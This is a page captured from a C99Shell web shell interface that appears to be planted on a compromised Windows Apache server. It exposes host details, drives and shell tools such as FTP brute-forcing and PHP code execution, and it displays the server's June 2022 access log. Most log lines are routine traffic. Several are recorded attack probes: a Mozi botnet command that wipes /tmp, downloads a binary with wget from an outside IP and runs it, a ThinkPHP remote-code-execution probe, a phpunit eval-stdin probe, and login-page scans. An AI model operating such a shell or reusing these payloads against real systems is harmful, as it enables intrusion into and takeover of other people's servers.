!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2022.06.16.log (1.46 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [15/Jun/2022:23:58:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Jun/2022:23:59:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:00:01:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:04:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:00:06:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:06:38 -0500] "GET /BLA/boletinlegal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 1018
172.22.2.4 - - [16/Jun/2022:00:05:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
172.22.2.4 - - [16/Jun/2022:00:07:27 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
207.46.13.134 - - [16/Jun/2022:00:08:42 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/EL-Burro-B-1-133x75.jpg HTTP/1.1" 200 4516
172.22.2.4 - - [16/Jun/2022:00:07:28 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63473
162.221.192.26 - - [16/Jun/2022:00:09:38 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109662
66.249.65.15 - - [16/Jun/2022:00:10:11 -0500] "-" 408 -
64.124.8.40 - - [16/Jun/2022:00:10:47 -0500] "GET /portaldeninos/wp-content/uploads/2018/10/oso.jpg HTTP/1.1" 200 305180
216.245.221.92 - - [16/Jun/2022:00:11:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:10:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:11:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [16/Jun/2022:00:13:06 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [16/Jun/2022:00:13:07 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [16/Jun/2022:00:13:07 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [16/Jun/2022:00:13:07 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [16/Jun/2022:00:13:07 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [16/Jun/2022:00:13:07 -0500] "GET /BLA/boletinlegal/images/abajo.png HTTP/1.1" 200 96676
172.22.2.4 - - [16/Jun/2022:00:13:08 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [16/Jun/2022:00:13:08 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [16/Jun/2022:00:13:08 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [16/Jun/2022:00:13:08 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [16/Jun/2022:00:13:08 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
172.22.2.4 - - [16/Jun/2022:00:13:12 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
172.22.2.4 - - [16/Jun/2022:00:13:12 -0500] "GET /BLA/boletinlegal/images/screen_1.png HTTP/1.1" 200 202547
172.22.2.4 - - [16/Jun/2022:00:13:12 -0500] "GET /BLA/boletinlegal/images/launch.jpg HTTP/1.1" 200 14577
172.22.2.4 - - [16/Jun/2022:00:13:19 -0500] "GET /BLA/boletinlegal/images/screen_2.png HTTP/1.1" 200 362502
172.22.2.4 - - [16/Jun/2022:00:13:19 -0500] "GET /BLA/boletinlegal/images/screen_3.png HTTP/1.1" 200 210620
172.22.2.4 - - [16/Jun/2022:00:13:19 -0500] "GET /BLA/boletinlegal/images/screen_5.png HTTP/1.1" 200 368876
172.22.2.4 - - [16/Jun/2022:00:13:27 -0500] "GET /BLA/boletinlegal/images/pdf.gif HTTP/1.1" 200 567
172.22.2.4 - - [16/Jun/2022:00:14:18 -0500] "GET /BLA/boletinlegal/images/background.gif HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:14:25 -0500] "GET /BLA/boletinlegal/Directivas/2022/DIRECTIVA%20No.%2000001%20DEL%2015%20DE%20JUNIO%20DEL%202022.pdf HTTP/1.1" 200 290944
172.22.2.4 - - [16/Jun/2022:00:13:12 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 63473
64.124.8.32 - - [16/Jun/2022:00:15:01 -0500] "GET /galeria/galeria/fotos/Soratama3P.jpg HTTP/1.1" 200 11298
216.245.221.92 - - [16/Jun/2022:00:16:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:16:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
119.36.44.233 - - [16/Jun/2022:00:17:46 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://119.36.44.233:37213/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 1018
64.124.8.40 - - [16/Jun/2022:00:17:54 -0500] "GET /portaldeninos/wp-content/uploads/2021/06/titulo-cabezote-ni%C3%B1os.png HTTP/1.1" 200 64425
172.22.2.4 - - [16/Jun/2022:00:16:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
64.124.8.32 - - [16/Jun/2022:00:19:21 -0500] "GET /galeria/galeria/fotos/Huemdal-%0A%0ACordoba3P.jpg HTTP/1.1" 403 1006
40.77.167.79 - - [16/Jun/2022:00:19:30 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204172%20DE%202007.pdf HTTP/1.1" 200 113210
216.245.221.92 - - [16/Jun/2022:00:21:37 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.40 - - [16/Jun/2022:00:21:58 -0500] "GET /portaldeninos/wp-content/uploads/2020/05/ig.jpg HTTP/1.1" 200 11470
201.245.192.253 - - [16/Jun/2022:00:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46768
201.245.192.253 - - [16/Jun/2022:00:22:01 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [16/Jun/2022:00:22:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47237
172.22.2.4 - - [16/Jun/2022:00:21:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:22:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53459
216.245.221.92 - - [16/Jun/2022:00:26:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:27:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:29:51 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%209%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [16/Jun/2022:00:28:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
157.55.39.127 - - [16/Jun/2022:00:30:34 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12492
216.245.221.92 - - [16/Jun/2022:00:31:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:00:31:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46768
201.245.192.253 - - [16/Jun/2022:00:31:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47237
172.22.2.4 - - [16/Jun/2022:00:33:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:34:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54266
157.55.39.127 - - [16/Jun/2022:00:36:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%201500-1549.tif HTTP/1.1" 200 4831289
216.245.221.92 - - [16/Jun/2022:00:36:37 -0500] "HEAD / HTTP/1.1" 200 -
128.14.209.162 - - [16/Jun/2022:00:39:23 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:00:39:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:00:41:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:40:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
201.245.192.253 - - [16/Jun/2022:00:41:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46768
191.97.9.11 - - [16/Jun/2022:00:41:58 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
191.97.9.11 - - [16/Jun/2022:00:41:58 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
191.97.9.11 - - [16/Jun/2022:00:42:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 389087
201.245.192.253 - - [16/Jun/2022:00:41:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47237
66.249.65.31 - - [16/Jun/2022:00:43:46 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:00:46:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:45:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:46:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
66.249.65.13 - - [16/Jun/2022:00:49:30 -0500] "-" 408 -
101.68.211.2 - - [16/Jun/2022:00:51:06 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:00:51:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:51:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:51:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:00:56:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:56:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:00:57:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56011
172.22.2.4 - - [16/Jun/2022:00:58:26 -0500] "GET /BLA/boletinlegal/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 40907
216.245.221.92 - - [16/Jun/2022:01:01:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:02:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:03:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55012
45.90.161.133 - - [16/Jun/2022:01:05:20 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [16/Jun/2022:01:06:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:06:39 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [16/Jun/2022:01:06:40 -0500] "GET /BLA/boletinlegal/Directivas/2017/Directiva%20No.%2006%20del%2016%20de%20Agosto%20de%202017.pdf HTTP/1.1" 200 310598
159.223.38.117 - - [16/Jun/2022:01:08:33 -0500] "HEAD / HTTP/1.0" 200 -
159.223.38.117 - - [16/Jun/2022:01:08:36 -0500] "GET /system_api.php HTTP/1.1" 404 1018
142.93.201.0 - - [16/Jun/2022:01:08:40 -0500] "HEAD / HTTP/1.1" 200 -
142.93.201.0 - - [16/Jun/2022:01:08:40 -0500] "GET /wp-login.php HTTP/1.1" 404 1196
142.93.201.0 - - [16/Jun/2022:01:08:41 -0500] "GET /wordpress/wp-login.php HTTP/1.1" 404 1196
159.223.38.117 - - [16/Jun/2022:01:08:41 -0500] "GET /c/version.js HTTP/1.1" 404 1018
142.93.201.0 - - [16/Jun/2022:01:08:41 -0500] "GET /blog/wp-login.php HTTP/1.1" 404 1196
142.93.201.0 - - [16/Jun/2022:01:08:41 -0500] "GET /wp/wp-login.php HTTP/1.1" 404 1196
159.223.38.117 - - [16/Jun/2022:01:08:45 -0500] "GET /streaming/clients_live.php HTTP/1.1" 404 1018
159.223.38.117 - - [16/Jun/2022:01:08:50 -0500] "GET /stalker_portal/c/version.js HTTP/1.1" 404 1018
159.223.38.117 - - [16/Jun/2022:01:08:54 -0500] "GET /stream/live.php HTTP/1.1" 404 1018
159.223.38.117 - - [16/Jun/2022:01:08:59 -0500] "GET /flu/403.html HTTP/1.1" 404 1018
159.223.38.117 - - [16/Jun/2022:01:09:03 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:01:08:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
65.49.20.69 - - [16/Jun/2022:01:10:21 -0500] "GET / HTTP/1.1" 200 319
207.46.13.172 - - [16/Jun/2022:01:10:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202000/2000%202850-2899.tif HTTP/1.1" 200 4291775
172.22.2.4 - - [16/Jun/2022:01:09:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60092
216.245.221.92 - - [16/Jun/2022:01:11:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [16/Jun/2022:01:15:21 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:14:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:01:16:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:15:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
157.55.39.8 - - [16/Jun/2022:01:19:41 -0500] "GET /galeria/mapa/humedal2017.jpg HTTP/1.1" 200 644667
31.148.130.228 - - [16/Jun/2022:01:19:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/1920.pdf HTTP/1.1" 200 509233
66.249.65.15 - - [16/Jun/2022:01:21:12 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:01:21:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:20:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:01:21:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46920
172.22.2.4 - - [16/Jun/2022:01:20:56 -0500] "GET /BLA/boletinlegal/?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 36811
172.22.2.4 - - [16/Jun/2022:01:21:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 49830
201.245.192.253 - - [16/Jun/2022:01:22:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47405
157.55.39.139 - - [16/Jun/2022:01:22:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2016%2F HTTP/1.1" 200 324776
157.55.39.8 - - [16/Jun/2022:01:23:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 794571
40.77.167.21 - - [16/Jun/2022:01:23:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 266846
216.245.221.92 - - [16/Jun/2022:01:26:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:01:27:37 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:26:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:26:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56372
216.245.221.92 - - [16/Jun/2022:01:31:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:01:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46920
201.245.192.253 - - [16/Jun/2022:01:32:00 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47405
66.249.65.13 - - [16/Jun/2022:01:33:21 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:31:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:32:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:01:36:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:38:23 -0500] "GET /BLA/boletinlegal/Circulares/2015/Circular%20No.%201%20del%2010%20de%20Febrero%20de%202015.pdf HTTP/1.1" 304 -
66.249.65.13 - - [16/Jun/2022:01:39:11 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:37:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
64.124.8.32 - - [16/Jun/2022:01:39:39 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:38:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:01:41:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:01:41:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46920
201.245.192.253 - - [16/Jun/2022:01:41:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47405
172.22.2.4 - - [16/Jun/2022:01:43:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.172 - - [16/Jun/2022:01:45:31 -0500] "GET /bla/resoluciones/resoluciones%202022/0039.pdf HTTP/1.1" 304 -
66.249.65.13 - - [16/Jun/2022:01:45:39 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:44:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
216.245.221.92 - - [16/Jun/2022:01:46:37 -0500] "HEAD / HTTP/1.1" 200 -
34.141.189.230 - - [16/Jun/2022:01:47:22 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:01:46:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63473
64.124.8.40 - - [16/Jun/2022:01:50:37 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:01:49:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:01:51:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:50:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57591
66.249.65.13 - - [16/Jun/2022:01:52:11 -0500] "-" 408 -
192.64.81.86 - - [16/Jun/2022:01:52:51 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [16/Jun/2022:01:51:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 62718
64.124.8.32 - - [16/Jun/2022:01:54:51 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:01:56:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:55:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:01:56:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
64.124.8.40 - - [16/Jun/2022:01:57:45 -0500] "-" 408 -
66.249.65.13 - - [16/Jun/2022:01:58:01 -0500] "-" 408 -
64.124.8.32 - - [16/Jun/2022:01:59:11 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:02:01:37 -0500] "HEAD / HTTP/1.1" 200 -
64.124.8.40 - - [16/Jun/2022:02:01:48 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:01:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:01:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
66.249.65.13 - - [16/Jun/2022:02:05:18 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:02:06:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:06:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:07:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
216.245.221.92 - - [16/Jun/2022:02:11:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:02:11:43 -0500] "-" 408 -
66.249.73.1 - - [16/Jun/2022:02:13:45 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:12:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:13:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58464
172.22.2.4 - - [16/Jun/2022:02:16:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
216.245.221.92 - - [16/Jun/2022:02:16:37 -0500] "HEAD / HTTP/1.1" 200 -
42.236.10.69 - - [16/Jun/2022:02:16:36 -0500] "GET /portaldeninos/ HTTP/1.1" 200 109666
66.249.65.13 - - [16/Jun/2022:02:18:03 -0500] "-" 408 -
69.63.189.19 - - [16/Jun/2022:02:19:09 -0500] "GET /sumate-a-las-jornadas-de-recoleccion-de-llantas-de-esta-semana.html HTTP/1.1" 206 787
172.22.2.4 - - [16/Jun/2022:02:18:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:19:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61027
207.46.13.81 - - [16/Jun/2022:02:21:07 -0500] "GET /secretaria-de-ambiente-exalta-a-organizaciones-y-colectivos-en-conmemoracion-del-dia-del-voluntariado-ambiental.html HTTP/1.1" 200 1093
216.245.221.92 - - [16/Jun/2022:02:21:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:02:21:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46909
201.245.192.253 - - [16/Jun/2022:02:21:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47411
66.249.65.13 - - [16/Jun/2022:02:24:50 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:24:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [16/Jun/2022:02:26:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:25:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
157.55.39.127 - - [16/Jun/2022:02:28:14 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12492
207.46.13.172 - - [16/Jun/2022:02:28:23 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
207.46.13.172 - - [16/Jun/2022:02:28:25 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
157.55.39.8 - - [16/Jun/2022:02:28:27 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
40.77.167.21 - - [16/Jun/2022:02:28:31 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
40.77.167.79 - - [16/Jun/2022:02:28:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
40.77.167.79 - - [16/Jun/2022:02:28:34 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
172.22.2.4 - - [16/Jun/2022:02:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
66.249.65.13 - - [16/Jun/2022:02:30:36 -0500] "-" 408 -
216.245.221.92 - - [16/Jun/2022:02:31:37 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:30:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:02:31:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46909
95.70.196.235 - - [16/Jun/2022:02:32:27 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [16/Jun/2022:02:31:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47411
172.22.2.4 - - [16/Jun/2022:02:31:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60610
20.96.170.139 - - [16/Jun/2022:02:32:52 -0500] "GET /noticias/rssambiente.php HTTP/1.1" 406 -
216.245.221.92 - - [16/Jun/2022:02:36:37 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:02:37:12 -0500] "-" 408 -
172.22.2.4 - - [16/Jun/2022:02:36:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [16/Jun/2022:02:36:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46470
172.22.2.4 - - [16/Jun/2022:02:36:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46988
172.22.2.4 - - [16/Jun/2022:02:41:18 -0500] "POST /BLA/boletinlegal/owa/auth.owa HTTP/1.1" 404 1018
216.245.221.92 - - [16/Jun/2022:02:41:37 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [16/Jun/2022:02:41:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 46909
201.245.192.253 - - [16/Jun/2022:02:42:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 47411
172.22.2.4 - - [16/Jun/2022:02:41:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [16/Jun/2022:02:43:48 -0500] "-" 408 -
40.77.139.0 - - [16/Jun/2022:02:44:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
40.77.139.116 - - [16/Jun/2022:02:44:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
40.77.139.14 - - [16/Jun/2022:02:44:22 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
40.77.139.90 - - [16/Jun/2022:02:44:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=TkA7eDJv4EK-IpeEDmwV+ElK.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
